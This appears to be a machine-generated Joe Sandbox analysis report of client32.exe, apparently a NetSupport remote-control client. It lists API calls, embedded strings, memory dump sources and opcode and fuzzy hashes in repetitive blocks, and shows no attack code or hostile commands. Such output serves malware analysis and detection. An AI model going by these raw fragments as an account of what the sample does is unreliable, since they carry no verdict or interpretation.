                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: MessagePost
• String ID: Unable to select/accept connection within 10sec, ignoring cmd %d$Warning. DoNotify(%d) not processed$Warning. Eval period expired - ignoring cmd %d (x%x) - idata %x - VistaUI %d
• API String ID: 410705778-2398254728
• Opcode ID: ba57e33ba6e0677790ef1c60b987477872059b8d4379fee97220d80381384bfa
• Instruction ID: 05798701b428304c80057879d977071bcb7a017165537b33727636eef533cf84
• Opcode Fuzzy Hash: ba57e33ba6e0677790ef1c60b987477872059b8d4379fee97220d80381384bfa
• Instruction Fuzzy Hash: 6DD10975E0064A9BDB94CF95D880BAEF7B5FB84328F5082BEDD1557380EB356940CBA0
APIs
  • Part of subcall function 110DC630: EnterCriticalSection.KERNEL32(111E9064,11018545,24DE4E77,?,?,?,1117A7A8,000000FF), ref: 110DC631
  • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
  • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
• std::exception::exception.LIBCMT ref: 1101B426
• __CxxThrowException@8.LIBCMT ref: 1101B441
  • Part of subcall function 11008D80: std::_Xinvalid_argument.LIBCPMT ref: 11008D9A
Strings
• NsAppSystem Info : Control Channel Sending Command : %d, xrefs: 1101B399
• NsAppSystem Info : Control Channel Command Sent : %d, xrefs: 1101B3BA
Yara matches
Similarity
• API ID: CriticalEnterException@8SectionThrowXinvalid_argument_memsetstd::_std::exception::exceptionwsprintf
• String ID: NsAppSystem Info : Control Channel Command Sent : %d$NsAppSystem Info : Control Channel Sending Command : %d
• API String ID: 2637870501-623348194
• Opcode ID: d812f64574eae1c4fb48af3016aead96b2e308c4460433a88607f1ea4946197e
• Instruction ID: 57dd9297704c65ab0c6bcb40d8263c5768676fb733a16b5b2db7577f0494a42a
• Opcode Fuzzy Hash: d812f64574eae1c4fb48af3016aead96b2e308c4460433a88607f1ea4946197e
• Instruction Fuzzy Hash: B87181B5D00359DFEB10CFA4C884BDDFBB4AF05318F248159D825AB381EB75AA84CB91
APIs
Strings
Yara matches
Similarity
• API ID: wsprintf$VisibleWindow
• String ID: %d,%d,%d,%d,%d,%d
• API String ID: 1671172596-1913222166
• Opcode ID: 0fcb5efb468b217f4c32e044bd224a886712e29eb8e703beb0db4db76b5a8a86
• Instruction ID: 343a7c5902a362ececb8f7ca127abed5b4c5d2d50e5eb0de1d2da9fabf51934b
• Opcode Fuzzy Hash: 0fcb5efb468b217f4c32e044bd224a886712e29eb8e703beb0db4db76b5a8a86
• Instruction Fuzzy Hash: 17519C74B00215AFD710CB68CC80FAAB7F9AF88704F508698E6599B281CB70ED45CBA1
APIs
• IsWindow.USER32(?), ref: 110354BF
• EnumChildWindows.USER32(?,Function_00035030), ref: 110354FC
  • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
  • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
  • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
  • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
  • Part of subcall function 11033760: IsWindow.USER32(?), ref: 11033768
  • Part of subcall function 11033760: GetWindowLongA.USER32(?,000000F0), ref: 1103377B
Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Window$ChildEnumErrorExitLastLongMessageProcessWindowswsprintf
• String ID: CltAutoLogon.cpp$IsWindow(hDia)
• API String ID: 2743442841-2884807542
• Opcode ID: 21a2b76fec222c1e6d0d260998ef43525eec84e1817e013d231b49b2bb670141
• Instruction ID: 266056e39768e9626d6b00a12ef6d260c21a84dff935472d76ead0117b905fd9
• Opcode Fuzzy Hash: 21a2b76fec222c1e6d0d260998ef43525eec84e1817e013d231b49b2bb670141
• Instruction Fuzzy Hash: 3241CFB5E207059FC720DF24C991B9AB7F6BF8071AF50846DD84687AA0EB32F544CB91
APIs
• _strtok.LIBCMT ref: 110393B2
  • Part of subcall function 1115F7E6: __getptd.LIBCMT ref: 1115F804
• _strtok.LIBCMT ref: 11039433
  • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
  • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
  • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
  • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: _strtok$ErrorExitLastMessageProcess__getptdwsprintf
• String ID: ; >$CLTCONN.CPP
• API String ID: 3120919156-788487980
• Opcode ID: dcf81aafb7d70219b407bb39dde41256934e084b07b6762410a41ac6d4931455
• Instruction ID: 48fd02c5cc66f23834ff9d805c81fd3cb0a4cfabe792bc6ab9c015f56f8a8e7f
• Opcode Fuzzy Hash: dcf81aafb7d70219b407bb39dde41256934e084b07b6762410a41ac6d4931455
• Instruction Fuzzy Hash: 4821E775F1425B6BD701CEA58C40F9AB6D49F85359F0440A5FE08DB380FAB4AD0183D2
APIs
• GetVersion.KERNEL32(24DE4E77,00000000,?,24DE4E77,1118736B,000000FF,?,11066188,NSMWClass,24DE4E77,?,1106DC18), ref: 110311AA
• __strdup.LIBCMT ref: 110311F5
  • Part of subcall function 110310B0: LoadLibraryA.KERNEL32(Kernel32.dll,24DE4E77,?,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 110310E2
  • Part of subcall function 110310B0: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,11186B98,000000FF,?,110311BB), ref: 11031120
  • Part of subcall function 110310B0: GetProcAddress.KERNEL32(00000000,ProcessIdToSessionId), ref: 1103112E
  • Part of subcall function 110310B0: FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,11186B98,000000FF,?,110311BB), ref: 11031154
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Library$AddressCurrentFreeLoadProcProcessVersion__strdup
• String ID: NSMWClass$NSMWClassVista
• API String ID: 319803333-889775840
• Opcode ID: 903a90e8a7d17424edb06c100f40dd41976d118595282118367260f60fabb7df
• Instruction ID: da22cb9b74e46dcd904e816c1cfbcb9dca7c1c5d087ee23a6b3981c0c6242146
• Opcode Fuzzy Hash: 903a90e8a7d17424edb06c100f40dd41976d118595282118367260f60fabb7df
• Instruction Fuzzy Hash: 2721D272E286855FD701CF688C407EAFBFAAB8A625F4086A9EC55C7780E736D805C750
APIs
• CreateWindowExA.USER32(80000000,SysListView32,11190240,?,?,?,?,00000000,80000000,?,00000000,00000000), ref: 110A9628
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CreateWindow
• String ID: ..\ctl32\listview.cpp$SysListView32$m_hWnd
• API String ID: 716092398-3171529584
• Opcode ID: 637c1e481861933b660f9025ac84e75a0f093096606961fd602d82f68461a821
• Instruction ID: 47062bfc9542a2c6c353129ffb0ec6f2ada6c6bd4fa77e90f028d1fc367f12b4
• Opcode Fuzzy Hash: 637c1e481861933b660f9025ac84e75a0f093096606961fd602d82f68461a821
• Instruction Fuzzy Hash: 74218E7960020AAFDB14DF59DC81FDBBBE9AF88314F10861DF95987281DB74E941CBA0
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: _strtok
• String ID: ,=
• API String ID: 1675499619-2677018336
• Opcode ID: d2de01c0851f5f09910fd20d88a83f3c74abcc9e5e0ac208d52fec541981aab0
• Instruction ID: feda1c23a4deb0c6415e8fc3f525424d3758ff44d9e037eb8c71fca6166ea7b8
• Opcode Fuzzy Hash: d2de01c0851f5f09910fd20d88a83f3c74abcc9e5e0ac208d52fec541981aab0
• Instruction Fuzzy Hash: 7111C266E0866B1FEB41CE699C11BCBB7D85F06259F04C0D5F95C9B341EA20F801C6E2
APIs
• _memmove.LIBCMT ref: 1114F04C
• _memmove.LIBCMT ref: 1114F086
  • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
  • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
  • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
  • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: _memmove$ErrorExitLastMessageProcesswsprintf
• String ID: ..\ctl32\WCUNPACK.C$n > 128
• API String ID: 6605023-1396654219
• Opcode ID: 39d3c9d7fc05fd47aebaf31cf4e64413a64e5022646b21ebdd41d3a989af53bd
• Instruction ID: df32f2f24868e4b0a831f81203bc5965ced63257c83ed47365b8bb2cf1ea103c
• Opcode Fuzzy Hash: 39d3c9d7fc05fd47aebaf31cf4e64413a64e5022646b21ebdd41d3a989af53bd
• Instruction Fuzzy Hash: 37112976C0116677C3118E2D9D88E8BFF69EB81A68F248125FC9817741F731A61087E2
APIs
• __itow.LIBCMT ref: 110EB422
  • Part of subcall function 11160BD9: _xtoa@16.LIBCMT ref: 11160BF9
• RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?,?,00000000,nsdevcon64.exe,11190240,?,?,?,?,?,?,110FCFEA), ref: 110EB447
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Value__itow_xtoa@16
• String ID: Error %d setting %s to %s$nsdevcon64.exe
• API String ID: 293635345-4188669160
• Opcode ID: 8a4b82b92a86a1b278d0f43154331440ff368002b1b446561c3dd2f6a6996a9c
• Instruction ID: cea032128ce82b3eaf0532e478ffcf8d701adba4055b92399446afe6a01fb2d0
• Opcode Fuzzy Hash: 8a4b82b92a86a1b278d0f43154331440ff368002b1b446561c3dd2f6a6996a9c
• Instruction Fuzzy Hash: 0401C075A01219AFD700CAA99C89FEAF7ECDB49708F108199F905E7240DA72AE0487A1
APIs
• InvalidateRect.USER32(00000000,00000000,00000000), ref: 11153583
• UpdateWindow.USER32(?), ref: 111535AE
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: InvalidateRectUpdateWindow
                                                                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                                    • API String ID: 1236202516-2830328467
                                                                                                                                                                                                    • Opcode ID: d7e7c2f0e3a6a5e44f8d0eeae6eb0b297d9b32f503593d364eb6036cc0b7aeaf
                                                                                                                                                                                                    • Instruction ID: b7b16df5a43d60f3fda019c1a35b497fb37b7041778627a412a7a8a3ae26887c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d7e7c2f0e3a6a5e44f8d0eeae6eb0b297d9b32f503593d364eb6036cc0b7aeaf
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6201A4B9B24716ABD2A5D761DC81F8AF364BF8572CF144828F1BB17580EA70F8808795
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 110A9E1D
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                                                                                                    • String ID: ..\ctl32\liststat.cpp$..\ctl32\listview.cpp$m_hWnd
                                                                                                                                                                                                    • API String ID: 819365019-2727927828
                                                                                                                                                                                                    • Opcode ID: 9b6d80b7455542f82354b29f9862b6f032892670bc7ed0853ece567b39401bfb
                                                                                                                                                                                                    • Instruction ID: e80c3d609587989e24333d1fa603ed55b2b214ac37036ff82e40f0e660cda7c6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9b6d80b7455542f82354b29f9862b6f032892670bc7ed0853ece567b39401bfb
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6BF0F038B80325AFE321D681EC81FC5B2949B05B05F100828F2462B6D0EAA5B4C0C781
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 1101D12F
                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 1101D136
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorExitItemLastMessageProcessShowWindowwsprintf
                                                                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                                                                                                                                                    • API String ID: 1319256379-1986719024
                                                                                                                                                                                                    • Opcode ID: 5591af17a89e0ca7adab3af439ec82609681faf43d0b1edc9c864f49cd37c925
                                                                                                                                                                                                    • Instruction ID: 4e2be1340c0eb87c864e4721684ff6510800268e2acfe58ec4bc6308307db221
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5591af17a89e0ca7adab3af439ec82609681faf43d0b1edc9c864f49cd37c925
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4AE0867A910329BFC310EE61DC89FDBF7ACDB45754F10C429FA2947200D674E94087A1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 1101D0DB
                                                                                                                                                                                                    • EnableWindow.USER32(00000000,?), ref: 1101D0E6
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: EnableErrorExitItemLastMessageProcessWindowwsprintf
• String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
• API String ID: 1136984157-1986719024
• Opcode ID: 9b6c0fd9a44062357b394c58c00652d207fdc6b2e6a946a601fd6034372f8a5b
• Instruction ID: 2b1270b1ce6598f01739890776adf1a6d9f8641e6ea7dfdd3b9eef3de0244db5
• Opcode Fuzzy Hash: 9b6c0fd9a44062357b394c58c00652d207fdc6b2e6a946a601fd6034372f8a5b
• Instruction Fuzzy Hash: 45E02636A00329BFD310EAA1DC84F9BF3ACEB44360F00C429FA6583600CA31E84087A1

APIs
• _errno.MSVCR100 ref: 6885EAE7
• _invalid_parameter_noinfo.MSVCR100 ref: 6885EAF2
  • Part of subcall function 6885AF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6882B6CF,?,6882C24B,00000003,688074A4,687EA948,0000000C,688074F7,00000001,00000001), ref: 6885AF85
• _errno.MSVCR100 ref: 6885EB0B
• _invalid_parameter_noinfo.MSVCR100 ref: 6885EB16
Memory Dump Source
• Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
• Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
Similarity
• API ID: _errno_invalid_parameter_noinfo$_invalid_parameter
• String ID:
• API String ID: 1328987296-0
• Opcode ID: 1d21298c185a489d5243185a17ccecaf2bcb37292b0f8223cf50577ae131f7b6
• Instruction ID: a623181bcc452312c5a8756e417c426c492f453860bd0a6d3dde945ffdae2899
• Opcode Fuzzy Hash: 1d21298c185a489d5243185a17ccecaf2bcb37292b0f8223cf50577ae131f7b6
• Instruction Fuzzy Hash: 63A13235A082598BCF21CF69CCD45DE7BB2AF99300F548999FCA5A7304D630DD61CBA2

APIs
Memory Dump Source
• Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
• Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
Similarity
• API ID: _errno_invalid_parameter_noinfo
• String ID:
• API String ID: 2959964966-0
• Opcode ID: 60e4596ce5a9e0a2e9c1fbba2ca985ea7d3551731e044f53e119f8d86f560dda
• Instruction ID: fc5cab22d1b3dbd509a8d163b99b9359563e5234d2ea79d8173bd62f01bff219
• Opcode Fuzzy Hash: 60e4596ce5a9e0a2e9c1fbba2ca985ea7d3551731e044f53e119f8d86f560dda
• Instruction Fuzzy Hash: C9916C34A08A59CBCF318F688ACC2AD7B75AF9A304F544069FC64A7344D7709D11EBB5

APIs
  • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
  • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
• std::exception::exception.LIBCMT ref: 11035277
• __CxxThrowException@8.LIBCMT ref: 1103528C
• std::exception::exception.LIBCMT ref: 1103529B
• __CxxThrowException@8.LIBCMT ref: 110352B0
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
